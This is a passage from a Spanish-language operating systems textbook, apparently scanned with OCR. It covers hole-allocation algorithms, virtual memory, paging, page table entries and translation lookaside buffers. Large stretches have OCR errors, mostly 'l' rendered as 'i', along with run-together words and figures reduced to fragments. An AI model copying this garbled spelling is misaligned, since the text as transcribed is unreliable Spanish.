tos hasta encontrar un hueco que sea lo bastante grande. Después el hueco se divide en dos partes, una 
para el proceso y otra para la memoria sin utilizar, excepto en el estadísticamente improbable caso de 
un ajuste exacto. El algoritmo del primer ajuste es rápido debido a que busca lo menos posible. 

Una pequeña variación del algoritmo del primer ajuste es el algoritmo del siguiente ajuste. 
Funciona de la misma manera que el primer ajuste, excepto porque lleva un registro de dónde se 
encuentra cada vez que descubre un hueco adecuado. La siguiente vez que es llamado para buscar 
un hueco, empieza a buscar en la lista desde el lugar en el que se quedó la última vez, en vez de 
empezar siempre desde el principio, como el algoritmo del primer ajuste. Las simulaciones realiza¬ 
das por Bays (1977) muestran que el algoritmo del siguiente ajuste tiene un rendimiento ligeramen¬ 
te peor que el del primer ajuste. 

Otro algoritmo muy conocido y ampliamente utilizado es el del mejor ajuste. Este algoritmo 
busca en toda la lista, de principio a fin y toma el hueco más pequeño quesea adecuado. En vez de 
dividir un gran hueco que podría necesitarse después, el algoritmo del mejor ajuste trata de buscar 
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un hueco que esté cerca del tamaño actual necesario, que coincida mejor con ia soiicitud y ios hue¬ 
cos disponibies. 

Como ejempio de ios aigoritmos de primer ajuste y de mejor ajuste, considere de nuevo ia fi¬ 
gura 3-6. Si se necesita un bioque de tamaño 2, ei aigoritmo dei primer ajuste asignará ei hueco en 
ia 5, pero ei dei mejor ajuste asignará ei hueco en ia 18. 

Ei aigoritmo dei mejor ajuste es más iento que ei dei primer ajuste, ya que debe buscar en to¬ 
da ia iista cada vez que se ie iiama. De manera sorprendente, también provoca más desperdicio de 
memoria que ios aigoritmos dei primer ajuste o dei siguiente ajuste, debido a que tiende a henar 
ia memoria con huecos pequeños e inutiiizabies. Ei aigoritmo dei primer ajuste genera huecos más 
grandes en promedio. 

Para resoiver ei probiema de dividir ias coincidencias casi exactas en un proceso y en un pe¬ 
queño hueco, podríamos considerar ei aigoritmo dei peor ajuste, es decir, tomar siempre ei hueco 
más grande disponibie, de manera queei nuevo hueco sea io bastante grande como para ser útii. La 
simuiación ha demostrado que ei aigoritmo dei peor ajuste no es muy buena idea tampoco. 

Los cuatro aigoritmos pueden ser aceierados manteniendo iistas separadas para ios procesos y 
ios huecos. De esta forma, todos eiios dedican toda su energía a inspeccionar ios huecos, no ios pro¬ 
cesos. Ei precio inevitabie que se paga por esta aceieración en ia asignación es ia compiejidad adi- 
cionai y ia ientitud ai desasignar ia memoria, ya que un segmento iiberado tiene que eiiminarse de 
ia iista de procesos e insertarse en ia iista de huecos. 

Si se mantienen distintas iistas para ios procesos y ios huecos, ia iista de huecos se puede man¬ 
tener ordenada por ei tamaño, para que ei aigoritmo dei mejor ajuste sea más rápido. Cuando ei ai¬ 
goritmo dei mejor ajuste busca en una iista de huecos, dei más pequeño ai más grande, tan pronto 
como encuentre un hueco que ajuste, sabrá que ei hueco es ei más pequeño que se puede utiiizar, 
de aquí que se ie denomine ei mejor ajuste. No es necesario buscar más, como con ei esquema de 
una soia iista. Con una iista de huecos ordenada por tamaño, ios aigoritmos dei primer ajuste y dei 
mejor ajuste son iguai de rápidos, y hace innecesario usar ei dei siguiente ajuste. 

Cuando ios huecos se mantienen en iistas separadas de ios procesos, una pequeña optimización 
es posibie. En vez de tener un conjunto separado de estructuras de datos para mantener ia iista de 
huecos, como se hizo en ia figura 3-6(c), ia información se puede aimacenar en ios huecos. La pri¬ 
mera paiabra de cada hueco podría ser ei tamaño dei mismo y ia segunda paiabra un apuntador a ia 
siguiente entrada. Los nodos de ia iista de ia figura 3-6(c), que requieren tres paiabrasy un bit (P/H), 
ya no son necesarios. 

U n aigoritmo de asignación más es ei denominado de ajuste rápido, ei cuai mantiene iistas se¬ 
paradas para aigunos de ios tamaños más comunes soiicitados. Por ejempio, podría tener una tabia 
con n entradas, en donde ia primera entrada es un apuntador a ia cabeza de una iista de huecos de 
4 KB, ia segunda entrada es un apuntador a una iista de huecos de 8 KB, i a tercera entrada un apun¬ 
tador a huecos de 12 KB y así sucesivamente. Por ejempio, ios huecos de 21 KB podrían coiocar- 
se en ia iista de 20 KB o en una iista especiai de huecos de tamaño inusuai. 

Con ei aigoritmo dei ajuste rápido, buscar un hueco dei tamaño requerido es extremadamente 
rápido, pero tiene ia misma desventaja que todos ios esquemas que se ordenan por ei tamaño dei 
hueco: cuando un proceso termina o es intercambiado, buscar en sus vecinos para ver si es posibie 
una fusión es un proceso costoso. Si no se reaiiza ia fusión, ia memoria se fragmentará rápidamen¬ 
te en un gran número de pequeños huecos en ios que no cabrá ningún proceso. 
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3.3 MEMORIA VIRTUAL 

M ¡entras que los registros base y límite se pueden utilizar para crear la abstracción de los espacios de 
direcciones, hay otro problemaquesetienequeresolver: la administración del agrandamientodel soft¬ 
ware (bloatware). A unque el tamaño de las memorias se incrementa con cierta rapidez, el del softwa¬ 
re aumenta con una mucha mayor. En la década de 1980, muchas universidades operaban un sistema 
de tiempo compartido con docenas de usuarios (más o menos satisfechos) trabajando simultáneamen¬ 
te en una VAX de 4 MB.Ahora M i crosoft recomienda tener por lo menos 512 MB para que un siste¬ 
ma Vista de un solo usuario ejecute aplicaciones simples y 1 GB si el usuario va a realizar algún 
trabajo serio. La tendencia hacia la multimedia impone aún mayores exigencias sóbrela memoria. 

Como consecuencia de estos desarrollos, existe la necesidad de ejecutar programas que son de¬ 
masiado grandes como para caber en la memoria y sin duda existe también la necesidad de tener 
sistemas que puedan soportar varios programas ejecutándose al mismo tiempo, cada uno de los cua¬ 
les cabe en memoria, pero que en forma colectiva exceden el tamaño de la misma. El intercambio 
no es una opción atractiva, ya que un disco SATA ordinario tiene una velocidad de transferencia pi¬ 
co de 100 M B/segundo a lo más, lo cual significa que requiere por lo menos 10 segundos para in¬ 
tercambiar un programa de 1 GB de memoria a disco y otros 10 segundos para intercambiar un 
programa de 1 GB del disco a memoria. 

El problema de que los programas sean más grandes que la memoria ha estado presente desde 
los inicios de la computación, en áreas limitadas como la ciencia y la ingeniería (para simular la 
creación del universo o, incluso, para simular una nueva aeronave, se requiere mucha memoria). 
U na solución que se adoptó en la década de 1960 fue dividir los programas en pequeñas partes, co¬ 
nocidas como sobrepuestos [overlays). Cuando empezaba un programa, todo lo que se cargaba en 
memoria era el administrador de sobrepuestos, que de inmediato cargaba y ejecutaba el sobrepues¬ 
to 0; cuando éste terminaba, indicaba al administrador de sobrepuestos que cargara el 1 encima del 
sobrepuesto 0 en la memoria (si había espacio) o encima del mismo (si no había espacio). A Igunos 
sistemas de sobrepuestos eran muy complejos, ya que permitían varios sobrepuestos en memoria a 
la vez. Los sobrepuestos se mantenían en el disco, intercambiándolos primero hacia adentro de la 
memoria y después hacia afuera de la memoria mediante el administrador de sobrepuestos. 

Aunque el trabajo real de intercambiar sobrepuestos hacia adentro y hacia afuera de la memo¬ 
ria lo realizaba el sistema operativo, el de dividir el programa en partes tenía que realizarlo el pro¬ 
gramador en forma manual. El proceso de dividir programas grandes en partes modulares más 
pequeñas consumía mucho tiempo, y era aburrido y propenso a errores. Pocos programadores eran 
buenos para esto. No pasó mucho tiempo antes de que alguien ideara una forma de pasar todo el 
trabajo a la computadora. 

El método ideado (Fotheringham, 1961) se conoce actualmente como memoria virtual. La idea 
básica detrás de la memoria virtual es que cada programa tiene su propio espacio de direcciones, el cual 
se divide en trozos llamados páginas Cada página es un rango contiguo de direcciones. Estas páginas se 
asocian a la memoria física, pero no todas tienen que estar en la memoria física para poder ejecutar el 
programa. Cuando el programa hace referencia a una parte de su espacio de direcciones que está en la 
memoria física, el hardware realiza la asociación necesaria al instante. Cuando el programa hace refe¬ 
rencia a una parte de su espacio de direcciones que no está en la memoria física, el sistema operativo 
recibe una alerta para buscar la parte faltante y volver a ejecutar la instrucción que falló. 
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En cierto sentido, ia memoria virtuai es una generaiización de ia idea de ios registros base y ií- 
mite. Ei procesador 8088 tenía registros base separados (pero no tenía registros iímite) para texto y 
datos. Con ia memoria virtuai, en vez de tener una reubicación por separado para ios segmentos de 
texto y de datos, todo ei espacio de direcciones se puede asociar a ia memoria física en unidades 
pequeñas equitativas. A continuación ie mostraremos cómo se impiementa ia memoria virtuai. 

La memoria virtuai funciona muy bien en un sistema de muitiprogramación, con bits y partes 
de muchos programas en memoria a ia vez. M ientras un programa espera a que una parte dei mis¬ 
mo se iea y coioque en ia memoria, ia CPU puede otorgarse a otro proceso. 

3.3.1 Paginación 

La mayor parte de ios sistemas de memoria virtuai utiiizan una técnica iiamada paginación, que 
describiremos a continuación. En cuaiquier computadora, ios programas hacen referencia a un con¬ 
junto de direcciones de memoria. Cuando un programa ejecuta una instrucción como 

MOV REG, 1000 

io hace para copiar ei contenido de ia dirección de memoria 1000 a reg (o viceversa, dependiendo 
de ia computadora). Las direcciones se pueden generar usando indexado, registros base, registros de 
segmentos y otras formas más. 


La CPU envía direcciones 



La MMU envía direcciones 
físicas a ia memoria 


Figura 3-8. La posición y función de la M M U. Aquí la M M U se muestra como parte 
del chip de CPU, debido a que es común esta configuración en la actualidad. Sin em¬ 
bargo, lógicamente podría ser un chip separado y lo era hace años. 


Estas direcciones generadas por ei programa se conocen como direcciones virtuales y forman 
ei espacio de direcciones virtuales. En ias computadoras sin memoria virtuai, ia dirección física 
se coioca directamente en ei bus de memoria y hace que se iea o escriba ia paiabra de memoria fí¬ 
sica con ia misma dirección. Cuando se utiiiza memoria virtuai, ias direcciones virtuai es no van di¬ 
rectamente ai bus de memoria. En vez de eiio, van a una MMU (Memory Managemente Unit, 
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Unidad de administración de memoria) que asocia ias direcciones virtuaies a ias direcciones de 
memoria físicas, como se iiustra en ia figura 3-8. 

En ia figura 3-9 se muestra un ejempio muy simpie de cómo funciona esta asociación. En este 
ejempio, tenemos una computadora que genera direcciones de 16 bits, desde O hasta 64 K. Éstas son 
ias direcciones virtuaies. Sin embargo, esta computadora sóio tiene 32 KB de memoria física. Así, 
aunque se pueden escribir programas de 64 KB, no se pueden cargar compietos en memoria y ejecu¬ 
tarse. No obstante, una copia compieta de ia imagen básica de un programa, de hasta 64 KB, debe 
estar presente en ei disco para que ias partes se puedan traer a ia memoria según sea necesario. 

Ei espacio de direcciones virtuaies se divide en unidades de tamaño fijo ñamadas páginas. Las 
unidades correspondientes en ia memoria física se ñaman marcos de página. Las páginas y ios mar¬ 
cos de página por io generai son dei mismo tamaño. En este ejempio son de 4 KB, pero en sistemas 
reai es se han utiiizado tamaños de página desde 512 bytes hasta 64 KB. Con 64 KB de espacio de 
direcciones virtuaies y 32 K B de memoria física obtenemos 16 páginas virtuaies y 8 marcos de pá¬ 
gina. Las transferencias entre i a RAM y ei disco siempre son en páginas compietas. 


Espacio de 
direcciones 
virtuales 

60Kñ64K 

56Kñ60K 

52Kñ56K 

48Kñ52K 

44Kñ48K 

40Kñ44K 

36Kñ40K 

32Kñ36K 

28Kñ32K 

24Kñ28K 

20Kñ24K 

16Kñ20K 

12Kñ16K 

8Kñ12K 

4Kñ8K 

0Kñ4K 



Dirección de 

memoria 

física 

28Kñ32K 

24Kñ28K 

20Kñ24K 

16Kñ20K 

12Kñ16K 

8Kñ12K 

4Kñ8K 

0Kñ4K 


Marco de página 


Figura 3-9. La relación entre las direcciones virtuales y las direcciones de memoria fí¬ 
sica está dada por la tabla de páginas. Cada página empieza en un múltiplo de 4096 y 
termina 4095 direcciones más arriba, por lo que de 4 K a 8 K en realidad significa de 
4096 a 8191 y de 8 K a 12 K significa de 8192 a 12287. 


La notación en ia figura 3-9 es ia siguiente. Ei rango marcado deOK a 4 K significa que ias di¬ 
recciones virtuaies o físicas en esa página son de 0 a 4095. Ei rango de 4 K a 8 K se refiere a ias 
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direcciones de 4096 a 8191 y así en io sucesivo. Cada página contiene exactamente 4096 direccio¬ 
nes que empiezan en un múitipio de 4096 y terminan uno antes dei múitipio de 4096. 

Por ejempio, cuando ei programa trata de acceder a ia dirección 0 usando ia instrucción 

MOV REG,0 

ia dirección virtuai 0 se envía a ia M M U. La M M U ve que esta dirección virtuai está en ia página 
0 (0 a 4095), quede acuerdo con su asociación es ei marco de página 2 (8192 a 12287). Así, trans¬ 
forma ia dirección en 8192 y envía ia dirección 8192 ai bus. La memoria no sabe nada acerca de ia 
M M U y sóio ve una petición para ieer o escribir en ia dirección 8192, ia cuai cumpie. De esta ma¬ 
nera, ia M M U ha asociado efectivamente todas iasdirecciones virtuai es entre 0 y 4095 sobre ias di¬ 
recciones físicas de 8192 a 12287. 

De manera simiiar, ia instrucción 

MOV REO,8192 
se transforma efectivamente en 

MOV REG,24576 

debido a que ia dirección virtuai 8192 (en ia página virtuai 2) se asocia con ia dirección 24576 (en 
ei marco de página físico 6). Como tercer ejempio, ia dirección virtuai 20500 está a 20 bytes dei 
inicio de ia página virtuai 5 (direcciones virtuaies 20480 a 24575) y ia asocia con ia dirección físi¬ 
ca 12288 -L 20 = 12308. 

Por sí soia, ia habiiidad de asociar 16 páginas virtuaies a cuaiquiera de ios ocho marcos de pá¬ 
gina mediante ia configuración de ia apropiada asociación de ia M M U no resueive ei probiema de 
que ei espacio de direcciones virtuaies sea más grande que ia memoria física. Como sóio tenemos 
ocho marcos de página físicos, sóio ocho de ias páginas virtuaies en ia figura 3-9 se asocian a ia 
memoria física. Las demás, que se muestran con una cruz en ia figura, no están asociadas. En ei 
hardware reai, un bit de presente/ausente i i eva ei registro de cuáies páginas están físicamente pre¬ 
sentes en i a memoria. 

¿Qué ocurre si ei programa hace referencia a direcciones no asociadas, por ejempio, mediante 
ei uso de i a instrucción 

MOV REG,32780 

que es ei byte 12 dentro de ia página virtuai 8 (empezando en 32768)? La M M U detecta que ia pá¬ 
gina no está asociada (io cuai se indica mediante una cruz en ia figura) y hace que ia CPU haga un 
trap ai sistema operativo. A este trap se ie iiama fallo de página. Ei sistema operativo seiecciona 
un marco de página queseutiiice poco y escribe su contenido devueita ai disco (si no es que ya es¬ 
tá ahí). Después obtiene ia página que se acaba de referenciar en ei marco de página que se acaba 
de iiberar, cambia ia asociación y reinicia ia instrucción que originó ei trap. 

Por ejempio, si ei sistema operativo decidiera desaiojar ei marco de página 1, cargaría ia pági¬ 
na virtuai 8 en ia dirección física 8192 y reaiizaría dos cambios en ia asociación de ia M M U. Pri¬ 
mero, marcaría ia entrada de ia página virtuai 1 como no asociada, para hacer un trap por cuaiquier 
acceso a ias direcciones virtuaies entre 4096 y 8191. Después reempiazaría ia cruz en ia entrada de 
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la página virtual 8 con un 1, de manera que al ejecutar la instrucción que originó el trap, asocie la 
dirección virtual 32780 a la dirección física 4108 (4096 + 12). 

Ahora veamos dentro de la M M U para analizar su funcionamiento y por qué hemos optado por 
utilizar un tamaño de página que sea una potencia de 2. En la figura 3-10 vemos un ejemplo de una 
dirección virtual, 8196 (0010000000000100 en binario), que se va a asociar usando la asociación 
de la M M U en la figura 3-9. La dirección virtual entrante de 16 bits se divide en un número de pá¬ 
gina de 4 bits y en un desplazamiento de 12 bits. Con 4 bits para el número de página, podemos te¬ 
ner 16 páginas y con los 12 bits para el desplazamiento, podemos direccionar todos los 4096 bytes 
dentro de una página. 



Dirección 
física saliente 
(24580) 


Dirección 

virtual 

entrante (8196) 


Figura 3-10. La operación interna de la M M U con 16 páginas de4 KB. 

El número de página se utiliza como índice en la tabla de páginas, conduciendo al número del 
marco de página que corresponde a esa página virtual. Si el bit de presente/ausente es 0, se provo¬ 
ca un trap al sistema operativo. Si el bit es 1, el número del marco de página encontrado en la tabla 
de páginas se copia a los 3 bits de mayor orden del registro de salida, junto con el desplazamien¬ 
to de 12 bits, que se copia sin modificación de la dirección virtual entrante. En conjunto forman una 
dirección física de 15 bits. Después, el registro de salida se coloca en el bus de memoria como 
la dirección de memoria física. 
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3.3.2 Tablas de páginas 

En una implementadón simple, la asociación de direcciones virtuales a direcciones físicas se pue¬ 
de resumir de la siguiente manera: la dirección virtual se divide en un número de página virtual 
(bits de mayor orden) y en un desplazamiento (bits de menor orden). Por ejemplo, con una direc¬ 
ción de 16 bits y un tamaño de página de 4 KB, los 4 bits superiores podrían especificar una de las 
16 páginas virtuales y los 12 bits inferiores podrían entonces especificar el desplazamiento de by- 
tes (0 a 4095) dentro de la página seleccionada. Sin embargo, también es posible una división con 
3, 5 u otro número de bits para la página. Las distintas divisiones implican diferentes tamaños de 
página. 

El número de página virtual se utiliza como índice en la tabla de páginas para buscar la entra¬ 
da para esa página virtual. En la entrada en la tabla de páginas, se encuentra el número demarco de 
página (si lo hay). El número del marco de página se adjunta al extremo de mayor orden del des¬ 
plazamiento, reemplazando el número de página virtual, para formar una dirección física que se 
pueda enviar a la memoria. 

Por ende, el propósito de la tabla de páginas es asociar páginas virtuales a los marcos de pági¬ 
na. Hablando en sentido matemático, la tabla de páginas es una función donde el número de página 
virtual es un argumento y el número de marco físico es un resultado. Utilizando el resultado de esta 
función, el campo de la página virtual en una dirección virtual se puede reemplazar por un campo de 
marco de página, formando así una dirección de memoria física. 


E structura de una entrada en la tabla de páginas 

A hora vamos a pasar de la estructura de las tablas de páginas en general a los detalles de una sola 
entrada en la tabla de páginas. La distribución exacta de una entrada depende en gran parte de la 
máquina, pero el tipo de información presente es aproximadamente el mismo de una máquina a otra. 
En la figura 3-11 proporcionamos un ejemplo de una entrada en la tabla de páginas. El tamaño va¬ 
ría de una computadora a otra, pero 32 bits es un tamaño común. El campo más importante es el 
número de marco de página. Después de todo, el objetivo de la asociación de páginas es mostrar 
este valor. Enseguida de este campo tenemos el bit de presente/ausente. Si este bit es 1, la entrada 
es válida y se puede utilizar. Si es 0, la página virtual a la que pertenece la entrada no se encuentra 
actualmente en la memoria. Al acceder a una entrada en la tabla de página con este bit puesto en 0 
se produce un fallo de página. 


Uso de caché 

deshabilitado Modificada Presente/ausente 



Referenciada Protección 


Figura 3-11. U na típica entrada en la tabla de páginas. 
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Los bits de protección indican qué tipo de acceso está permitido. En su forma más simpie, es¬ 
te campo contiene 1 bit, con 0 para iectura/escritura y 1 para sóio iectura. Un arregio más sofistica¬ 
do es tener 3 bits: uno para habiiitar ia iectura, otro para ia escritura y ei tercero para ejecutar ia 
página. 

Los bits de modificada y referenciada iievan ei registro dei uso de páginas. Cuando se escri¬ 
be en una página, ei hardware estabiece de manera automática ei bit de modificada. Este bit 
es vaiioso cuando ei sistema operativo decide reciamar un marco de página. Si ia página en éi 
ha sido modificada (es decir, está "sucia"), debe escribirse de vueita en ei disco. Si no se ha mo¬ 
dificado (es decir, está "iimpia") sóio se puede abandonar, debido a que ia copia dei disco es 
aun váiida. A este bit se ie conoce aigunas veces como bit sucio, ya que refieja ei estado de ia 
página. 

Ei bit de referenciada se estabiece cada vez que una página es referenciada, ya sea para ieer o 
escribir. Su función es ayudar ai sistema operativo a eiegir una página para desaiojaria cuando ocu¬ 
rre un faiio de página. Las páginas que no se estén utiiizando son mejores candidatos que ias pági¬ 
nas que se están utiiizando y este bit desempeña un importante papei en varios de ios aigoritmos de 
reempiazo de páginas que estudiaremos más adeiante en este capítuio. 

Finaimente, ei úitimo bit permite deshabiiitar ei uso de caché para ia página. Esta característi¬ 
ca es importante para ias páginas que se asocian con ios registros de dispositivos en vez de ia me¬ 
moria. Si ei sistema operativo está esperando en un cicio de espera hermético a que cierto 
dispositivo de E/S responda a un comando que acaba de recibir, es esenciai que ei hardware siga 
obteniendo ia paiabra dei dispositivo y no utiiice una copia antigua en ia caché. Con este bit, ei uso 
de ia caché se puede desactivar. Las máquinas que tienen un espacio de E/S separado y no utiiizan 
E/S asociada a ia memoria no necesitan este bit. 

Observe que ia dirección dei disco utiiizado para guardar ia página cuando no está en memo¬ 
ria no forma parte de ia tabia de páginas. La razón es simpie: ia tabia de páginas sóio guarda ia in¬ 
formación que ei hardware necesita para traducir una dirección virtuai en una dirección física. La 
información que necesita ei sistema operativo para manejar ios faiios de página se mantiene en ta- 
bias de software dentro dei sistema operativo. Ei hardware no ia necesita. 

A ntes de anaiizar más aspectos de ia impiementación, vaie ia pena recaicar de nuevo que io que 
ia memoria virtuai hace es crear una abstracción — ei espacio de direcciones— que es una abstrac¬ 
ción de ia memoria física, ai iguai que un proceso es una abstracción dei procesador físico (CPU). 
Para impiementar ia memoria virtuai, hay que descomponer ei espacio de direcciones virtuaies en 
páginas y asociar cada una a cierto marco de página de memoria física o dejada (temporaimente) 
sin asociar. Por ende, este capítuio trata fundamentaimente de una abstracción creada por ei siste¬ 
ma operativo y ia forma en que se administra esa abstracción. 


3.3.3 Aceleración de la paginación 

Acabamos de ver ios fundamentos de ia memoria virtuai y ia paginación. Ahora es tiempo de en¬ 
trar en más detaiie acerca de ias posibies impiementaciones. E n cuaiquier sistema de paginación hay 
que abordar dos cuestiones principaies: 
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1. La asociación de una dirección virtuai a una dirección física debe ser rápida. 

2. Si ei espacio de direcciones virtuaies es grande, ia tabia de páginas será grande. 

Ei primer punto es una consecuencia dei hecho de que ia asociación virtuai-a-física debe reaii- 
zarse en cada referencia de memoria. Todas ias instrucciones deben provenir finaimente de ia me¬ 
moria y muchas de eiias hacen referencias a operandos en memoria también. En consecuencia, es 
necesario hacer una, dos o aigunas veces más referencias a ia tabia de páginas por instrucción. Si 
ia ejecución de una instrucción tarda, por ejempio 1 nseg, ia búsqueda en ia tabia de páginas debe 
reaiizarse en menos de 0.2 nseg para evitar que ia asociación se convierta en un cueiio de boteiia 
importante. 

Ei segundo punto se deriva dei hecho de que todas ias computadoras modernas utiiizan direc¬ 
ciones virtuaies de por io menos 32 bits, donde 64 bits se vueiven cada vez más comunes. Por de¬ 
cir, con un tamaño de página de4KB, un espacio de direcciones de 32 bits tiene 1 miiión de páginas 
y un espacio de direcciones de 64 bits tiene más de ias que desearíamos contempiar. Con 1 miiión 
de páginas en ei espacio de direcciones virtuai, ia tabia de páginas debe tener 1 miiión de entradas. 
Y recuerde que cada proceso necesita su propia tabia de páginas (debido a que tiene su propio es¬ 
pacio de direcciones virtuaies). 

La necesidad de una asociación de páginas extensa y rápida es una restricción considerabie en 
cuanto a ia manera en que se construyen ias computadoras. Ei diseño más simpie (por io menos 
en concepto) es tener una soia tabia de páginas que consista en un arregio de registros de hardwa¬ 
re veioces, con una entrada para cada página virtuai, indexada por número de página virtuai, como 
se muestra en ia figura 3-10. Cuando se inicia un proceso, ei sistema operativo carga ios registros 
con ia tabia de páginas dei proceso, tomada de una copia que se mantiene en ia memoria principai. 
Durante ia ejecución dei proceso no se necesitan más referencias a memoria para ia tabia de pági¬ 
nas. Las ventajas de este método son que es simpie y no requiere referencias a memoria durante ia 
asociación. Una desventaja es que es extremadamente costoso que ia tabia de páginas sea extensa: 
otra es que tener que cargar ia tabia de páginas compieta en cada conmutación de contexto ve afec¬ 
tado ei rendimiento. 

En ei otro extremo, toda ia tabia de páginas puede estar en ia memoria principai. Así, todo io 
que ei hardware necesita es un soio registro que apunte ai inicio de ia tabia de páginas. Este diseño 
permite cambiar ia asociación de direcciones virtuaies a direcciones físicas ai momento de una con¬ 
mutación de contexto con sóio recargar un registro. Desde iuego, tiene ia desventaja de requerir una 
o más referencias a memoria para ieer ias entradas en ia tabia de páginas durante ia ejecución de 
cada instrucción, con io cuai se hace muy ienta. 

Búferes de traducción adelantada 

Ahora veamos esquemas impiementados ampiiamente para aceierar ia paginación y manejar espa¬ 
cios de direcciones virtuai es extensos, empezando con ia aceieración deia paginación. Ei punto ini- 
ciai deia mayor parte de ias técnicas de optimización es que ia tabia de páginas está en ia memoria. 
Potenci ai mente, este diseño tiene un enorme impacto sobre ei rendimiento. Por ejempio, considere 
una instrucción de 1 byte que copia un registro a otro. A faita de paginación, esta instrucción hace 
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sólo una referencia a memoria para obtener ia instrucción. Con ia paginación se requiere ai menos 
una referencia adicionai a memoria para acceder a ia tabia de páginas. Como ia veiocidad de ejecu¬ 
ción está comúnmente iimitada por ia proporción a ia que ia CPU puede obtener instrucciones y da¬ 
tos de ia memoria, ai tener que hacer dos referencias a memoria por cada una de eiias se reduce ei 
rendimiento a ia mitad. Bajo estas condiciones, nadie utiiizaría ia paginación. 

Los diseñadores de computadoras han sabido acerca de este probiema durante años y han idea¬ 
do una soiución que está basada en ia observación de que ia mayor parte de ios programas tienden 
a hacer un gran número de referencias a un pequeño número de páginas y no viceversa. Por ende, 
sóio se iee con mucha frecuencia una pequeña fracción de ias entradas en ia tabia de páginas: ei res¬ 
to se utiiiza muy pocas veces. 

La soiución que se ha ideado es equipar a ias computadoras con un pequeño dispositivo de hard¬ 
ware para asociar direcciones virtuaies a direcciones físicas sin pasar por ia tabia de páginas. Ei dis¬ 
positivo, iiamado TLB (Transiation Lookaside Buffer, Búfer de traducción adeiantada) o aigunas 
veces memoria asociativa, seiiustra en ia figura 3-12. Por io generai se encuentra dentro deia M M U 
y consiste en un pequeño número de entradas, ocho en este ejempio, pero raras veces más de 64. Ca¬ 
da entrada contiene información acerca de una página, inciuyendo ei número de página virtuai, un 
bit que se estabiece cuando se modifica ia página, ei código de protección (permisos de iectura/es- 
critura/ejecución) y ei marco de página físico en ei que se encuentra ia página. Estos campos tienen 
una correspondencia de uno a uno con ios campos en ia tabia de páginas, excepto por ei número de 
página virtuai, que no se necesita en ia tabia de páginas. Otro bit indica si ia entrada es váiida (es 
decir, si está en uso) o no. 
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Figura 3-12. Un TLB para acelerar la paginación. 

Un ejempio que podría generar ei TLB de ia figura 3-12 es un proceso en un cicio que abarque 
ias páginas virtuaies 19, 20 y 21, de manera que estas entradas en ei TLB tengan códigos de pro¬ 
tección para iecturay ejecución. Los datos principaies que se están utiiizando (por decir, un arregio 
que se esté procesando) se encuentran en ias páginas 129 y 130. La página 140 contiene ios índices 
utiiizados en ios cáicuios dei arregio. Ai finai, ia piia está en ias páginas 860 y 861. 

Ahora veamos cómo funciona ei TLB. Cuando se presenta una dirección virtuai a ia M M U pa¬ 
ra que i a traduzca, ei hardware primero comprueba si su número de página virtuai está presente en 
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el TLB al compararla con todas las entradas en forma simultánea (es decir, en paralelo). Si se en¬ 
cuentra una coincidencia válida y el acceso no viola los bits de protección, el marco de página se 
toma directamente del TLB, sin pasar por la tabla de páginas. Si el número de página virtual está 
presente en el TLB, pero la instrucción está tratando de escribir en una página de sólo lectura, se 
genera un fallo por protección. 

El caso interesante es lo que ocurre cuando el número de página virtual no está en el TLB. La 
M M U detecta que no está y realiza una búsqueda ordinaria en la tabla de páginas. Después desalo¬ 
ja una de las entradas del TLB y la reemplaza con la entrada en la tabla de páginas que acaba de 
buscar. De esta forma, si esa página se utiliza pronto otra vez, la segunda vez se producirá un acier¬ 
to en el TLB en vez de un fracaso. Cuando se purga una entrada del TLB, el bit modificado se co¬ 
pia devuelta a la entrada en la tabla de páginas en memoria. Los otros valores ya están ahí, excepto 
el bit de referencia. Cuando el TLB se carga de la tabla de páginas, todos los campos se toman de 
la memoria. 

Administración del TLB mediante software 

Hasta ahora hemos supuesto que toda máquina con memoria virtual paginada tiene tablas de pági¬ 
nas reconocidas por el hardware, más un TLB. En este diseño, la administración y el manejo de fa¬ 
llas del TLB se realiza por completo mediante el hardware de la M M U. Las traps, o trampas, para 
el sistema operativo ocurren sólo cuando una página no se encuentra en memoria. 

En el pasado, esta suposición era correcta. Sin embargo, muchas máquinas RISC modernas (in¬ 
cluyendo SPARC, M IPS y HP PA) hacen casi toda esta administración de páginas mediante softwa¬ 
re. En estas máquinas, las entradas del TLB se cargan de manera explícita mediante el sistema 
operativo. Cuando no se encuentra una coincidencia en el TLB, en vez de que la M M U vaya a las 
tablas de páginas para buscar y obtener la referencia a la página que se necesita, sólo genera un fa¬ 
llo del TLB y pasa el problema al sistema operativo. El sistema debe buscar la página, eliminar una 
entrada del TLB, introducir la nueva página y reiniciar la instrucción que originó el fallo. Y, desde 
luego, todo esto se debe realizar en unas cuantas instrucciones, ya que los fallos del TLB ocurren 
con mucha mayor frecuencia que los fallos de página. 

De manera sorprendente, si el TLB es razonablemente grande (por ejemplo, de 64 entradas) para 
reducir la proporción de fallos, la administración del TLB mediante software resulta tener una eficien¬ 
cia aceptable. El beneficio principal aquí es una M M U mucho más simple, lo cual libera una cantidad 
considerable de área en el chip de CPU para cachés y otras características que pueden mejorar el ren¬ 
dimiento. Uhlig y colaboradores (1994) describen la administración del TLB mediante software. 

Se han desarrollado varias estrategias para mejorar el rendimiento en equipos que realizan la ad¬ 
ministración del TLB mediante software. Un método se enfoca en reducir los fallos del TLB y el cos¬ 
to de un fallo del TLB cuando llega a ocurrir (Bala y colaboradores, 1994). Para reducir los fallos del 
TLB, algunas veces el sistema operativo averigua de modo "intuitivo" cuáles páginas tienen más pro¬ 
babilidad de ser utilizadas a continuación y precarga entradas para ellas en el TLB. Por ejemplo, cuan¬ 
do un proceso cliente envía un mensaje a un proceso servidor en el mismo equipo, es muy probable que 
el servidor tenga que ejecutarse pronto. Sabiendo esto al tiempo que procesa el trap para realizar la ope¬ 
ración send, el sistema también puede comprobar en dónde están las páginas de código, datos y pila del 
servidor, asociándolas antes de que tengan la oportunidad de producir fallos del TLB. 
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La forma normal de procesar un fallo del TLB, ya sea en hardware o en software, es ir a la ta¬ 
bla de páginas y realizar las operaciones de indexado para localizar la página referenciada. El pro¬ 
blema al realizar esta búsqueda en software es que las páginas que contienen la tabla de páginas tal 
vez no estén en el TLB, lo cual producirá fallos adicionales en el TLB durante el procesamiento. 
Estos fallos se pueden reducir al mantener una caché grande en software (por ejemplo, de4 KB) de 
entradas en el TLB en una ubicación fija, cuya página siempre se mantenga en el TLB. Al compro¬ 
bar primero la caché de software, el sistema operativo puede reducir de manera substancial los fa¬ 
llos del TLB. 

Cuando se utiliza la administración del TLB mediante software, es esencial comprender la di¬ 
ferencia entre los dos tipos de fallos. Un fallo suave ocurre cuando la página referenciada no está 
en el TLB, sino en memoria. Todo lo que se necesita aquí es que el TLB se actualice. No se nece¬ 
